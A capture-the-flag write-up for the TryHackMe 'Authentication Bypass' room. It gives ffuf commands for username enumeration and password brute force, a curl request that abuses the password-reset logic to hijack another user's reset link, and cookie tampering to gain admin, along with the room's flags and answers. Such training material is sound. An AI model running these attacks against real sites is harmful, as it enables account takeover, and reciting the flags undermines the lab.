Authentication Bypass

Task 2 Username Enumeration 

ffuf -w  /usr/share/seclists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.63.82/customers/signup -mr "username already exists"

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : POST
 :: URL              : http://10.10.63.82/customers/signup
 :: Wordlist         : FUZZ: /usr/share/seclists/Usernames/Names/names.txt
 :: Header           : Content-Type: application/x-www-form-urlencoded
 :: Data             : username=FUZZ&email=x&password=x&cpassword=x
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Regexp: username already exists
________________________________________________

admin                   [Status: 200, Size: 3720, Words: 992, Lines: 77]
robert                  [Status: 200, Size: 3720, Words: 992, Lines: 77]
simon                   [Status: 200, Size: 3720, Words: 992, Lines: 77]
steve                   [Status: 200, Size: 3720, Words: 992, Lines: 77]
:: Progress: [10177/10177] :: Job [1/1] :: 127 req/sec :: Duration: [0:01:20] :: Errors: 0 ::

What is the username starting with si*** ?
simon

What is the username starting with st*** ?
steve

What is the username starting with ro**** ?
robert


#Task 3 Brute Force 
vi valid_usernames.txt                                                                                                                 1 ⨯
                                                                                                                                               
(base) ┌──(root💀lucy)-[/home/gd/Downloads]
└─# ffuf -w valid_usernames.txt:W1,/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.63.82/customers/login -fc 200

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : POST
 :: URL              : http://10.10.63.82/customers/login
 :: Wordlist         : W1: valid_usernames.txt
 :: Wordlist         : W2: /usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-100.txt
 :: Header           : Content-Type: application/x-www-form-urlencoded
 :: Data             : username=W1&password=W2
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
 :: Filter           : Response status: 200
________________________________________________

[Status: 302, Size: 0, Words: 1, Lines: 1]
    * W1: steve
    * W2: thunder

:: Progress: [303/303] :: Job [1/1] :: 127 req/sec :: Duration: [0:00:02] :: Errors: 0 ::


- What is the valid username and password (format: username/password)?
steve/thunder


#Task 4 Logic Flaw 

http://10.10.63.82/customers/signup
create account hack:withpass
login
curl 'http://10.10.63.82/customers/reset?email=robert@acmeitsupport.thm' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=robert&email=hacker@customer.acmeitsupport.thm'


Support tickets
We've received, a request to reset your password, please visit http://10.10.63.82/customers/reset/d10d858a6524a39abe2a9996915a1e5b to automatically login, and then you can reset your password from the 'Your Account' page.

Run http://10.10.63.82/customers/reset/d10d858a6524a39abe2a9996915a1e5b
---> Support Tickets
Please don't tell anyone this! THM{AUTH_BYPASS_COMPLETE} 


What is the flag from Robert's support ticket?
THM{AUTH_BYPASS_COMPLETE}


Task 5 Cookie Tampering 
What is the flag from changing the plain text cookie values?
curl -H "Cookie: logged_in=true; admin=true" http://10.10.63.82/cookie-test 
Logged In As An Admin - THM{COOKIE_TAMPERING}

answer:THM{COOKIE_TAMPERING}

What is the value of the md5 hash 3b2a1053e3270077456a79192070aa78 ?
https://crackstation.net/
463729



- What is the base64 decoded value of VEhNe0JBU0U2NF9FTkNPRElOR30= ?
hint: echo "VEhNe0JBU0U2NF9FTkNPRElOR30=" | base64 -d
THM{BASE64_ENCODING



- Encode the following value using base64 {"id":1,"admin":true}
hint: echo '{"id":1,"admin":true}' | base64                                                                                                127 ⨯
eyJpZCI6MSwiYWRtaW4iOnRydWV9Cg==




http://10.10.63.82/customers/reset/d10d858a6524a39abe2a9996915a1e5b
https://tryhackme.com/room/authenticationbypass
https://www.hackingetico.org/authentication-bypass-habitaci%C3%B3n-de-tryhackme/